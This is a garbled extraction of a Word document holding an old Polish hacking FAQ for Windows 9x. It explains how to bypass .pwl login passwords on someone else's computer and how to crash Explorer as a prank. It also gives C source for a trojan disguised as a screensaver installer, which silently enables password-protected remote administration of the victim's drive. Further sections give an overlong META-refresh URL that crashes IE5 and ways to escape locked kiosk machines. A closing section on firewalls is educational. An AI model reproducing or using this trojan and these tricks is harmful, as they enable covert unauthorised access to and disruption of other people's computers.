        <w:t xml:space="preserve">0-65534)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 xml:space="preserve">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run </w:t>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">tutaj znajdują się uruchamiane aplikacje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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion</w:t>
        <w:tab/>
        <w:t>\RunServices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - uruchomione przed logowaniem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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion</w:t>
        <w:tab/>
        <w:t xml:space="preserve">\Uninstall </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">- Dodaj/Usuń programy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HKEY_CURRENT_USER\Control Panel\Desktop\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allpaperOrginX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - położenie tła względem osi X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WallpaperOrginY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - położenie tła względem osi Y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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>[ WINDOWS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t;&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>PWL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&l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Hasła dostępu do Windowsa przechowywane są w jego katalogu głównym. Rozszerzeniem takiego pliku z hasłem jest .pwl, a nazwa pliku jest nazwą użytkownika. Istnieje bardzo dużo programów do rozkodowywania plików pwl. Oprócz tego istenieją także programy, które wyciągają hasła użyte przez użytkownika do wejścia np. na jakiś dysk sieciowy. Przykładem takiego programu może być Cain. Świetny programik poleca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 zakończenie tego tematu przypominam, że jeżeli nie chcemy się bawić w łamanie takich haseł, to wystarczy dostać się na komputer do którego chcemy mieć dostęp. Znajdujemy w katalogu głównym Windowsa plik .pwl i robimy jego kopię zapasową. Teraz tworzymy pusty ale taki sam plik jak wcześniej i odpalamy Windowsa. Po zapytaniu o hasło naciskamy enter i już mamy dostęp do dysku. Na zakończenie pracy przegrywamy kopię .pw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 miejsce nowego pliku (tego co był pusty) i spokojnie odchodzimy od kompa.</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>[ WINDOWS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t;&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Jak utrudnić komuś życie?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&l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st wiele sposobów na rozwalenie komuś windowsa albo na zrobienie jakiejś rzeczy która dość porządnie zdenerwuje naszego wrog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ierwszy ze sposobów będzie polegał na utworzeniu jakiegoś pliku na pulpicie. Teraz tworzymy do niego dwa skróty dając im nazwę kolejno dla pierwszego np. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>link1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i dla drugiego </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>link2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. Niestety windows nie pozwala na utworzenie skrótu do skrótu i dlatego posłużyć będziemy musieli się tutaj DOS'em albo np. Farem. Teraz edytujemy plik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>link1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i tam gdzie podaliśmy nazwę utworzonego na początku jakiegoś pliku, zmieniamy wszystkie jego wystąpienia na link2. To samo robimy w pliku </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>link2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> z tym, że zamieniamy wszystkie wystąpienia na link1.</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eraz kasujemy pierwszy utworzony plik (żeby nie zaśmiecał nam pulpit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a dwa linki kopiujemy do katalogu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>desktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> w windows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eraz wystarczy na pulpicie dać odśwież i widzimy efekt - ciągłe pokazywanie się informacji o nieprawidłowej operacji explor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o dobrze! Ale jak się tego pozbyć? Wystarczy ponownie wejść do DOS'a czy Fara, usunąć te dwa pliki i odświeżyć pulpi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Jak wiecie windows ma możliwość zdalnego administrowania dyskiem. Naciskając przycisk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>start &gt; ustawienia &gt; panel sterowania &gt; hasła</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> znajdziemy zakładkę zdalnej administracji i konfigurujemy haselko i dostęp. Jego instalacja jest banalna. No ale jak do odpalić u kumpla np z osiedlowej sieci? Sposobów jest kilka. Np. idzemy do niego i mówimy, że potrzebujemy jakiś plików z systemu. Puszczamy jakiś kit, że chce nam się pic i żeby nam coś dał - kolega wychodzi z pokoju a ty masz chwilowy dostęp do jego kompa. No ale czy nie lepiej było by napisać jakiś progs który zrobi to wszystko za nas? Oczywiście, że TA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Jak wiadomo większość windowsa zapisana jest w rejestrze. Posiedziałem trochę nad analizą rejestru i napisałem program który odpalony na jakim kolwiek komputerze uruchomi po cichutku zdalnego administratora zabezpieczonego hasłem.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niżej znajdziecie progs mojego autorstwa napisany w Borland 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OBSŁUG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 pierwsze będziesz potrzebował jakiś wygaszacz ekranu (screensave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Ja do swojego programu użyłem wygaszacza Escape. Pakujemy dosowskim rarem ten wygaszacz wraz z plikiem readme.txt (jeśli nie ma to przegraj z innego wygaszacza) na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i zminiamy jego nazwę na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>data.dat</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Następnie kompilujemy programik na plik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>scrsaver.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i te dwa pliczki umieszczamy gdzieś w udostępnionym katalogu pod jakąś super nazwą (np. bardzo tajne), tak aby ktoś kto przegląda ten katalog od razu zwrócił na to uwagę. Klient przegrywa to do siebie i odpala plik .ex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 jego uruchomieniu programik sam zainstaluje mu zdalnego, a on otrzyma niewinny screensave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rawda, że prost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c) 2000 Jerry / MSS-00670-6681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Program uruchomiony na jakim kolwiek komputerze instaluje zdalną</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 obsługę administracji dyskiem i zakłada na nie hasło net987.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con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stdlib.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clude &lt;stdio.h&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int main(voi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lrsc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highvide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gotoxy(1,2);</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printf("  ESCAPE SCREENSAVER v1.0 instalation...\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  Unpacked all files...\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  escape.scr ... O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rintf("  readme.txt ... O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if (freopen("tmp00000.da$", "w", stdou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 NUL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printf(stderr, "error redirecting stdout\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REGEDIT4\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HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Network]\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Installed=1\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HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\Real Mode Net]\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transport=*nwlink,ndishlp.sys\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netcard=pcind.dos\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LoadRMDrivers=hex:01,00,00,00\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preferredredir=VREDIR\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HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan]\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HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\ADMIN$]\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Flags=dword:00000302\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Type=dword:00000000\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Path=C:\\\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Parm2enc=hex:\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Parm1enc=hex:7b,df,19,9f,6b,9e\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printf("Remark=\n");</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fclose(stdou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rename data.dat data.ex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data.exe &gt;NU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del data.ex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regedit /s tmp00000.da$ &gt;NU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del tmp00000.da$ &gt;NU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copy escape.scr %WinDir%\temp &gt;NU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system("del scrsaver.exe &gt;NUL");</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      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>return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oniższy kod należy wpisać w plik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i go uruchomić.</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 niektórych systemach z zainstalowanym Internet Explorer 5.0 spowoduje zawieszenie komputera lub całkowite wyłączenie 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 xml:space="preserve">&lt;META HTTP-EQUIV="Refresh" </w:t>
        <w:tab/>
        <w:t>CONTENT="0;URL=file://test/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAA5ZĚ¬AAAAAAAAAAAAAAAAAAAAAAACCCCCSSSŞ-</w:t>
        <w:tab/>
        <w:t>#§¬HP+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:tab/>
        <w:t>/"&g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lt;HTML&gt;Thx for using Internet Explorer 5.0&lt;/HTML&g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CUT HER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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>[ WINDOWS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t;&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Sztuczki </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>&lt;&l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Jeżeli macie Internet Explorer 5.0 możecie w bardzo banalny sposób zobaczyć pewną sztuczkę. Należy utwórzcie jaki kolwiek plik z końcówką </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i wpisać w nim taką linijkę:</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lt;!-- introducing the Trident team --&g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stępnie zapisać i uruchomić pli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iem, że w większości faqów znajduje się text na temat bugów w przydzielonym shellu ale jest to jedna z lepszych sztuczek w czarodziejskim windowsie tak więc i ja postaram się napisać coś na ten tema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Sprawa jest prosta. Zdarza się, że na jakiś targach np. jak ja byłem na INFOSYSTEM'2000 to leżały sobie jakieś komputer z zablokowanym dostęp do dysków. Mamy przykładowo odpaloną przeglądarkę Internet Explorer 5.0.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W pasku </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>adresy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> wpisujemy n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file://c:\windows\explorer.ex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file://c:\command.co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lbo od raz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c:\windows\explorer.ex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command.co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żeli mamy dostęp do pulpitu, ale nie mamy dostępu do jakiś innych rzeczy, to tworzymy skrót a w lini poleceń wpisujem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fil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 już jesteśmy w domci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stnieją także inne możliwości dostania się na window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hoćby przez stworzenie foldera XXXX.{NNNN-NNNN} gdzie XXXX to nazwa foldera, a NNNN to numery przestrzenne używane przez windowsa do uruchomienia poszczególnych zadań.</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208D2C60-3AEA-1069-A2D7-08002B30309D} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>- Network Neighborhood</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2227A280-3AEA-1069-A2DE-08002B30309D} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>- Printers</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20D04FE0-3AEA-1069-A2D8-08002B30309D} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>- My Computer</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21EC2020-3AEA-1069-A2DD-08002B30309D}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Control Panel</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645FF040-5081-101B-9F08-00AA002F954E} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>- Recycle Bin</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85BBD920-42A0-1069-A2E4-08002B30309D}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Brief Cas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871C5380-42A0-1069-A2EA-08002B30309D}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Internet Explorer</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D6277990-4C6A-11CF-8D87-00AA0060F5BF}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Task Schedule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rzykła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Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}</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DODATKI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Firewalls &lt;&lt;</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Zapory ogniowe (FIREWAL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odstawowa zasada dzialania wszelkich systemow ochronnych jest: "To co nie jest jawnie dozwolone - jest zakazane". Firewalle (zapory ogniowe) sa instalowane miedzy sieciami w celu wymuszenia kontroli dostepu miedzy nimi. Generalnie rzecz ujmujac, firewalle zabezpieczaja przed nieautoryzowanym dostepem z zewnatrz do sieci lokalnej. Niektore nawet moga calkowicie blokowac ruch pakietow z zewnatrz - dopuszczajac ewentualnie pakiety poczty elektronicznej - zezwalajac jednakze na swobodne komunikowanie sie uzytkownikow sieci ze swiatem zewnetrznym. Inna pozyteczna cecha firewalli jest mozliwosc wykorzystania ich do rejestrowania i sledzenia wszelkich przychodzacych pakietow (auditing). Stacje umieszczane w pierwszej linii obrony, okreslane rowniez jako bastion host, sa punktami przez ktore przechodza wszystkie informacje do sieci lokalnej i na zewnatrz. Dzieki takiemu scentralizowaniu drog dostepu do sieci w jednym komputerze mozna latwo zarzadzac systemem ochrony.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Rodzaje zapór ogniow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Na rynku dostepnych jest wiele produktow sprzedawanych pod nazwa "Firewall", lecz roznia sie one poziomem oferowanych zabezpieczen. Filtry pakietowe (Network Level) na podstawie adresu zrodlowego i docelowego oraz portu pojedynczego pakietu decyduja, czy dana przesylka moze zostac przeslana dalej, czy tez nie. Zwyczajny router nie jest zwykle w stanie takiej decyzji podjac, lecz bardziej nowoczesne konstrukcje moga przechowywac wewnetrzne informacje o stanie polaczen przechodzacych przez niego, zawartosci niektorych strumieni danych itp. Filtry pakietowe sa zwykle bardzo szybkie, jednak ich wada jest, ze podane kryteria selekcji moga okazac sie niewystarczajace dla niektorych uslug internetowych, przez co do sieci bylyby przepuszczane niepozadane pakiety, a wtedy... Jedna z mozliwych prob ataku moze byc umieszczenie pakietow wyzszego poziomu w falszywych ramkach MAC lub protokolu warstwy 3 (sieciowa) i 4 (transportowa) modelu ISO/OSI. Czesto wystarczy tylko zmienic adres nadawcy pakietu. W takim przypadku filtr pakietowy jest bezradny.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Bramki typu Circuit Level sa w stanie przyporzadkowywac pakiety do istniejacych polaczen TCP i dzieki temu kontrolowac cala transmisje. Zaawansowane systemy potrafia takze kojarzyc pakiety protokolu UDP, ktory w rzeczywistosci kontroli polaczen nie posiad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Firewalle Application Level to, generalnie rzecz ujmujac, hosty, na ktorych uruchomiono proxy servers, ktore nie zezwalaja na bezposredni ruch pakietow pomiedzy sieciami oraz rejestruja i sledza caly ruch przechodzacy przez niego. Proxies potrafia wiec niejako odseparowac "wiarygodna" czesc sieci od podejrzanej; moga magazynowac najczesciej zadane informacje - klient kieruje swoje zadanie do proxy, ktory wyszukuje obiekt w swoich lokalnych zasobach i zwraca zamawiajacemu. Dla kazdej aplikacji (czyli uslugi sieciowej, np. http, ftp, telnet, smtp, snmp, ...) istnieje osobny proxy, dla ktorego definiowane sa reguly wedlug ktorych podejmowana jest decyzja o zaakceptowaniu badz odrzuceniu polaczenia. Niewatpliwym minusem tego rozwiazania jest koniecznosc stosowania wielu proxies do obslugi roznych aplikacji; jezeli dla danego protokolu nie jest dostepny odpowiedni proxy, to dane przesylane w tym formacie nie beda w ogole przepuszczane przez bramke. Na rynku dostepne sa tez systemy z proxies definiowanymi przez uzytkownika funkcjonujacymi jednakze nie na plaszczyznie aplikacji, lecz analogicznie do filtrow pakietowych i bramek Circuit Leve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Cechy zapór ogniowych (FIREWALL'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echy firewall'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umozliwiaja dostep jedynie do uslug skonfigurowanych przez administratora, ktore moga byc bezpiecznie uzytkowane (m.in. HTTP Proxy, Gopher, SHTTP, SSL, JavaGuard, ActiveXGuard, KeywordGuard, URL screening, RSH Proxy, Telnet Proxy, Rlogin Proxy, FTP Proxy, X11 Proxy, Finger Proxy, SMTP Proxy, POP Proxy, SNMP Proxy, NNTP Proxy, LPR Proxy, Whois Proxy, Circuit Proxy, RealAudio Proxy, RealVideo Proxy, Xing Proxy, Netshow Proxy, VDOLive Proxy, Logging System, reports, alerts, scripting, SNMP agent, SecureID, Integrated VPN, DES56, PCX Client, Authentication Server, DNS Hiding, Content Vector Protocol)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zapewniaja pelne bezpieczenstwo przez sprawdzanie zawartosci komunikacji sieciowej WWW, FTP, SMTP, Telnet i Rlogin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realizuja funkcje SSN (Secure Server Network)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tlumaczenie i ukrywanie prywatnych adresow IP chronionej sieci komputerowej przez utajnienie rzeczywistych adresow sieci prywatnej oraz tlumaczenie 'w locie' adresow niewlasciwych, dzieki temu mozliwe jest wykonywanie identyfikacji i autoryzacji - ukrywanie infrastruktury sieci wewnetrznej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spoldzialaja z systemami wykrywania wlaman (np. RealSecure), ktore w razie wykrycia wlamywacza niezwlocznie powiadamiaja o tym aby niebezpieczny kanal komunikacji sieciowej zostal w pore zablokowany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moga wspolpracowac z programami antywirusowymi, kontroli antywirusowej poddawane sa wszystkie przychodzace z Internetu pliki, wiadomosci lub caly generowany ruch (rowniez zlosliwe aplety Jav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filtrownie adresow URL (niepozadana zawartosc 